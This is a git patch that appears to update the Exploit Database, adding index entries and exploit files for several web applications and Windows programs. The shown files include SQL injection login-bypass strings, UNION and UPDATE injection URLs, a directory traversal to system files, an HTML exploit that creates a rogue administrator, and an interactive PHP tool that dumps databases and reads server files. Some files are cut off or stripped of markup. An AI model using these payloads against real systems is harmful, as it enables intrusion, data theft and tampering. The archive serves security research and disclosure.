From 8198dd43d5de65dfc9c08e74e707840ff07d446d Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 10 Jan 2014 04:25:18 +0000 Subject: [PATCH] Updated 01_10_2014 --- files.csv | 19 ++ platforms/asp/webapps/30793.txt | 11 + platforms/asp/webapps/30794.txt | 11 + platforms/asp/webapps/30796.txt | 7 + platforms/asp/webapps/30798.txt | 9 + platforms/asp/webapps/30800.html | 7 + platforms/cgi/webapps/30795.txt | 8 + platforms/php/webapps/30689.php | 179 ++++++++++++++ platforms/php/webapps/30786.txt | 37 +++ platforms/php/webapps/30792.html | 9 + platforms/php/webapps/30799.txt | 7 + platforms/php/webapps/30801.txt | 12 + platforms/php/webapps/30803.txt | 10 + platforms/php/webapps/30804.txt | 9 + platforms/windows/dos/30550.php | 45 ++++ platforms/windows/dos/30797.html | 29 +++ platforms/windows/dos/30805.html | 30 +++ platforms/windows/local/30783.py | 50 ++++ platforms/windows/local/30802.c | 365 ++++++++++++++++++++++++++++ platforms/windows/webapps/30669.txt | 138 +++++++++++ 20 files changed, 992 insertions(+) create mode 100755 platforms/asp/webapps/30793.txt create mode 100755 platforms/asp/webapps/30794.txt create mode 100755 platforms/asp/webapps/30796.txt create mode 100755 platforms/asp/webapps/30798.txt create mode 100755 platforms/asp/webapps/30800.html create mode 100755 platforms/cgi/webapps/30795.txt create mode 100755 platforms/php/webapps/30689.php create mode 100755 platforms/php/webapps/30786.txt create mode 100755 platforms/php/webapps/30792.html create mode 100755 platforms/php/webapps/30799.txt create mode 100755 platforms/php/webapps/30801.txt create mode 100755 platforms/php/webapps/30803.txt create mode 100755 platforms/php/webapps/30804.txt create mode 100755 platforms/windows/dos/30550.php create mode 100755 platforms/windows/dos/30797.html create mode 100755 platforms/windows/dos/30805.html create mode 100755 platforms/windows/local/30783.py create mode 100755 platforms/windows/local/30802.c create mode 100755 platforms/windows/webapps/30669.txt diff --git a/files.csv b/files.csv index 2639f8f01..85c303e1a 100755 --- a/files.csv +++ b/files.csv @@ -27404,6 +27404,7 @@ id,file,description,date,author,platform,type,port 30545,platforms/asp/webapps/30545.txt,"Absolute Poll Manager XE 4.1 xlaapmview.asp Cross Site Scripting Vulnerability",2007-08-30,"Richard Brain",asp,webapps,0 30546,platforms/windows/local/30546.txt,"Multiple MicroWorld eScan Products Local Privilege Escalation Vulnerability",2007-08-30,"Edi Strosar",windows,local,0 30547,platforms/hardware/webapps/30547.txt,"D-Link DSL-2750U ME_1.09 - CSRF Vulnerability",2013-12-28,"FIGHTERx war",hardware,webapps,0 +30550,platforms/windows/dos/30550.php,"Ofilter Player 1.1 - (.wav) Integer Division by Zero",2013-12-28,"Osanda Malith",windows,dos,0 30553,platforms/php/webapps/30553.txt,"Toms Gästebuch 1.00 form.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0 30554,platforms/php/webapps/30554.txt,"Toms Gästebuch 1.00 admin/header.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0 30555,platforms/php/webapps/30555.txt,"MKPortal 1.0/1.1 Admin.PHP Authentication Bypass Vulnerability",2007-09-03,Demential,php,webapps,0 @@ -27519,6 +27520,7 @@ id,file,description,date,author,platform,type,port 30666,platforms/multiple/local/30666.txt,"ACE Stream Media 2.1 - (acestream://) Format String Exploit PoC",2014-01-03,LiquidWorm,multiple,local,0 30667,platforms/hardware/webapps/30667.txt,"Technicolor TC7200 - Multiple CSRF Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0 30668,platforms/hardware/webapps/30668.txt,"Technicolor TC7200 - Multiple XSS Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0 +30669,platforms/windows/webapps/30669.txt,"DirectControlTM Version 3.1.7.0 - Multiple Vulnerabilties",2014-01-03,"mohamad ch",windows,webapps,0 30672,platforms/windows/dos/30672.txt,"Live for Speed Skin Name Buffer Overflow Vulnerability",2007-10-13,"Luigi Auriemma",windows,dos,0 30673,platforms/hardware/remote/30673.txt,"NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 Error Page Cross Site Scripting Vulnerability",2007-10-15,SkyOut,hardware,remote,0 30674,platforms/java/webapps/30674.txt,"Stringbeans Portal 3.2 Projects Script Cross-Site Scripting Vulnerability",2007-10-15,JosS,java,webapps,0 @@ -27534,6 +27536,7 @@ id,file,description,date,author,platform,type,port 30684,platforms/php/webapps/30684.txt,"SiteBar <= 3.3.8 integrator.php lang Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0 30685,platforms/php/webapps/30685.txt,"SiteBar <= 3.3.8 index.php target Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0 30686,platforms/php/webapps/30686.txt,"SiteBar <= 3.3.8 command.php Modify User Action uid Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0 +30689,platforms/php/webapps/30689.php,"Taboada Macronews <= 1.0 - SQLi Exploit",2014-01-04,Jefrey,php,webapps,0 30691,platforms/php/webapps/30691.txt,"Alacate-Lucent OmniVista 4760 Multiple Cross Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0 30692,platforms/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 ierpplug.dll ActiveX Control Import Playlist Name Stack Buffer Overflow Vulnerability",2007-10-18,anonymous,windows,remote,0 30693,platforms/php/webapps/30693.txt,"SocketKB 1.1.5 Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",php,webapps,0 @@ -27617,7 +27620,23 @@ id,file,description,date,author,platform,type,port 30778,platforms/asp/webapps/30778.txt,"Click&BaneX Details.ASP SQL Injection Vulnerability",2007-11-19,"Aria-Security Team",asp,webapps,0 30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 Responder Local Privilege Escalation Vulnerability",2007-11-20,"Andrew Christensen",linux,local,0 30781,platforms/osx/remote/30781.txt,"Apple Mac OS X 10.5.x Mail Arbitrary Code Execution Vulnerability",2007-11-20,"heise Security",osx,remote,0 +30783,platforms/windows/local/30783.py,"CCProxy 7.3 - Integer Overflow Exploit",2014-01-07,Mr.XHat,windows,local,0 +30786,platforms/php/webapps/30786.txt,"Middle School Homework Page 1.3 Beta 1 - Multiple Vulnerabilities",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,80 30787,platforms/php/remote/30787.rb,"vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload",2014-01-07,metasploit,php,remote,80 30788,platforms/windows/local/30788.rb,"IcoFX Stack Buffer Overflow",2014-01-07,metasploit,windows,local,0 30789,platforms/windows/local/30789.rb,"IBM Forms Viewer Unicode Buffer Overflow",2014-01-07,metasploit,windows,local,0 30790,platforms/php/webapps/30790.txt,"Cubic CMS - Multiple Vulnerabilities",2014-01-07,"Eugenio Delfa",php,webapps,80 +30792,platforms/php/webapps/30792.html,"Underground CMS 1.x Search.Cache.Inc.PHP Backdoor Vulnerability",2007-11-21,D4m14n,php,webapps,0 +30793,platforms/asp/webapps/30793.txt,"VUNET Mass Mailer 'default.asp' SQL Injection Vulnerability",2007-11-21,"Aria-Security Team",asp,webapps,0 +30794,platforms/asp/webapps/30794.txt,"VUNET Case Manager 3.4 'default.asp' SQL Injection Vulnerability",2007-11-21,The-0utl4w,asp,webapps,0 +30795,platforms/cgi/webapps/30795.txt,"GWExtranet Multiple Directory Traversal Vulnerabilities",2007-11-21,joseph.giron13,cgi,webapps,0 +30796,platforms/asp/webapps/30796.txt,"E-vanced Solutions E-vents 5.0 Multiple Input Validation Vulnerabilities",2007-11-21,joseph.giron13,asp,webapps,0 +30797,platforms/windows/dos/30797.html,"Aurigma Image Uploader 4.x ActiveX Control Multiple Remote Stack Buffer Overflow Vulnerabilities",2007-11-22,"Elazar Broad",windows,dos,0 +30798,platforms/asp/webapps/30798.txt,"NetAuctionHelp 4.1 Search.ASP SQL Injection Vulnerability",2007-11-22,"Aria-Security Team",asp,webapps,0 +30799,platforms/php/webapps/30799.txt,"MySpace Scripts Poll Creator Index.PHP HTML Injection Vulnerability",2007-11-22,Doz,php,webapps,0 +30800,platforms/asp/webapps/30800.html,"FooSun Api_Response.ASP SQL Injection Vulnerability",2007-11-23,flyh4t,asp,webapps,0 +30801,platforms/php/webapps/30801.txt,"Bandersnatch 0.4 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-11-23,"Tim Brown",php,webapps,0 +30802,platforms/windows/local/30802.c,"VMware Tools 3.1 HGFS.Sys Local Privilege Escalation Vulnerability",2007-11-24,SoBeIt,windows,local,0 +30803,platforms/php/webapps/30803.txt,"CoolShot E-Lite POS 1.0 Login SQL Injection Vulnerability",2007-11-24,"Aria-Security Team",php,webapps,0 +30804,platforms/php/webapps/30804.txt,"VBTube 1.1 Search Cross Site Scripting Vulnerability",2007-11-24,Crackers_Child,php,webapps,0 +30805,platforms/windows/dos/30805.html,"RichFX Basic Player 1.1 ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-25,"Elazar Broad",windows,dos,0 diff --git a/platforms/asp/webapps/30793.txt b/platforms/asp/webapps/30793.txt new file mode 100755 index 000000000..562f70012 --- /dev/null +++ b/platforms/asp/webapps/30793.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/26522/info + +Mass Mailer is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +The following proof-of-concept example is available: + +Login Page (Default.asp) + +Password: anything' OR 'x'='x \ No newline at end of file diff --git a/platforms/asp/webapps/30794.txt b/platforms/asp/webapps/30794.txt new file mode 100755 index 000000000..6317903aa --- /dev/null +++ b/platforms/asp/webapps/30794.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/26523/info + +VUNET Case Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +VUNET Case Manager 3.4 is vulnerable; other versions may also be affected. + +The following example password is available for the 'Login' page ('Default.asp'): + +Password: anything' OR 'x'='x \ No newline at end of file diff --git a/platforms/asp/webapps/30796.txt b/platforms/asp/webapps/30796.txt new file mode 100755 index 000000000..008d79f44 --- /dev/null +++ b/platforms/asp/webapps/30796.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/26526/info + +E-vanced Solutions E-vents is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/eventsignup.asp?ID=4197 UNION ALL SELECT username, etc FROM users-- \ No newline at end of file diff --git a/platforms/asp/webapps/30798.txt b/platforms/asp/webapps/30798.txt new file mode 100755 index 000000000..6fd6c2507 --- /dev/null +++ b/platforms/asp/webapps/30798.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/26540/info + +NetAuctionHelp is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +NetAuctionHelp 4.1 is vulnerable; other versions may also be affected. + +http://www.example.com/search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=[SQL INJECTION] http://www.example.com/search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch='having 1=1-- http://www.example.com/search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@servername)-- http://www.example.com/search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@version)-- http://www.example.com/itemdtl.asp?id=1-1' UPDATE tblAd set descr= 'HACKED' Where(ID= '1');-- \ No newline at end of file diff --git a/platforms/asp/webapps/30800.html b/platforms/asp/webapps/30800.html new file mode 100755 index 000000000..84e85fd94 --- /dev/null +++ b/platforms/asp/webapps/30800.html @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/26552/info + +FooSun is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> foosun create new admin exp Codz By flyh4t ------------------------ foosun create new admin exp Codz By flyh4t ---------------------------
foosun path:

Hey boy, fun the game...
It is just a exp for the bug of foosun...
can create a new admin oldjun/12345678...
\ No newline at end of file diff --git a/platforms/cgi/webapps/30795.txt b/platforms/cgi/webapps/30795.txt new file mode 100755 index 000000000..a29a68fa3 --- /dev/null +++ b/platforms/cgi/webapps/30795.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/26525/info + +GWExtranet is prone to multiple directory-traversal vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the webserver process. Information obtained may aid in further attacks. + +http://www.example.com/gwextranet/scp.dll/sendto?user=calendar+of+events&mid=474020FA.GWEMAIL_DEPOT.SDEPO.100.167656B.1.1B00.1&template=.././../../boot.ini%00 +http://www.example.com/gwextranet/scp.dll/nbfile?user=calendar%20of%20events&format=&mid=46FA2724.GWEMAIL_DEPOT.SDEPO.100.167656B.1.198E.1&folder=Calendar&altcolor=cccccc&template=gwextra&caldays=1&startday=&file=../scp.dll \ No newline at end of file diff --git a/platforms/php/webapps/30689.php b/platforms/php/webapps/30689.php new file mode 100755 index 000000000..c8ed49312 --- /dev/null +++ b/platforms/php/webapps/30689.php @@ -0,0 +1,179 @@ +] MAIN MENU"); + puts("[1] Browse MySQL"); + puts("[2] Run SQL Query"); + puts("[3] Read file"); + puts("[4] About"); + puts("[0] Exit"); + $resp = gets(); + + if($resp=="0") + exit; + elseif($resp=="1") { + + // pega dbs + $i = 0; + puts("[.] Getting databases:"); + while(true) { + $pega = runquery("SELECT schema_name FROM information_schema.schemata LIMIT $i,1"); + if($pega) + puts(" - ".$pega); + else + break; + + $i++; + } + + puts("[!] Current database: ".runquery("SELECT database()")); + puts("[?] Enter database name for select:"); + $own = array(); + $own['db'] = gets(); + $own['dbh'] = hex($own['db']); + + // pega tables da db + $i = 0; + puts("[.] Getting tables from $own[db]:"); + while(true) { + $pega = runquery("SELECT table_name FROM information_schema.tables WHERE table_schema=$own[dbh] LIMIT $i,1"); + if($pega) + puts(" - ".$pega); + else + break; + + $i++; + } + puts("[?] Enter table name for select:"); + $own['tb'] = gets(); + $own['tbh'] = hex($own['tb']); + + // pega colunas da table + $i = 0; + puts("[.] Getting columns from $own[db].$own[tb]:"); + while(true) { + $pega = runquery("SELECT column_name FROM information_schema.columns WHERE table_schema=$own[dbh] AND table_name=$own[tbh] LIMIT $i,1"); + if($pega) + puts(" - ".$pega); + else + break; + + $i++; + } + puts("[?] Enter columns name, separated by commas (\",\") for select:"); + $own['cl'] = explode(",", gets()); + + // pega dados das colunas + + foreach($own['cl'] as $coluna) { + $i = 0; + puts("[=] Column: $coluna"); + while(true) { + $pega = runquery("SELECT $coluna FROM $own[db].$own[tb] LIMIT $i,1"); + if($pega) { + puts(" - $pega"); + $i++; + } else + break; + } + + echo "\n[ ] -+-\n"; + } + + main(); + + } elseif($resp=="2") { + puts("[~] RUN SQL QUERY"); + puts("[!] You can run a SQL code. It can returns a one-line and one-column content. You can also use concat() or group_concat()."); + puts("[?] Query (enter for exit): "); + $query = gets(); + if(!$query) main(); + else main(runquery($query."\n")); + } elseif($resp=="3") { + puts("[?] File path (may not have priv):"); + $file = hex(gets()); + $le = runquery("SELECT load_file($file) AS wc"); + if($le) + main($le); + else + main("File not found, empty or no priv!"); + + } elseif($resp=="4") { + puts("Coded by 0KaL @ WhiteCollarGroup"); + puts("tinyurl.com/WCollarGroup"); + main(); + } + else + main("[!] Wrong choice."); +} + +main(); \ No newline at end of file diff --git a/platforms/php/webapps/30786.txt b/platforms/php/webapps/30786.txt new file mode 100755 index 000000000..1d18d95e4 --- /dev/null +++ b/platforms/php/webapps/30786.txt @@ -0,0 +1,37 @@ +Middle School Homework Page V1.3 Beta 1 - Multiple Vulnerabilties +=================================================================== + +#################################################################### +.:. Author : AtT4CKxT3rR0r1ST +.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com] +.:. Home : http://www.iphobos.com/blog/ +.:. Script : http://sourceforge.net/projects/mshwpage/ +#################################################################### + +I. Sql Injection + +############## +VULNERABILITY +############## +/view.php (line 3-4) +----------------------------------------------------------------------------- + +

Homework for as of :

+alert(document.cookie); + +#################################################################### diff --git a/platforms/php/webapps/30792.html b/platforms/php/webapps/30792.html new file mode 100755 index 000000000..8fea2f7f8 --- /dev/null +++ b/platforms/php/webapps/30792.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/26521/info + +Underground CMS is prone to a backdoor vulnerability. + +Attackers can exploit this issue to gain unauthorized access to the application. Successful attacks will compromise the affected application and possibly the underlying webserver. + +Underground CMS 1.4, 1.7, and 1.8 are vulnerable; other versions may also be affected. + + Ucms v. 1.8 Np exploit

Ucms v. 1.8 Np exploit

Actual Request:

Host:
Password:
Phpcode: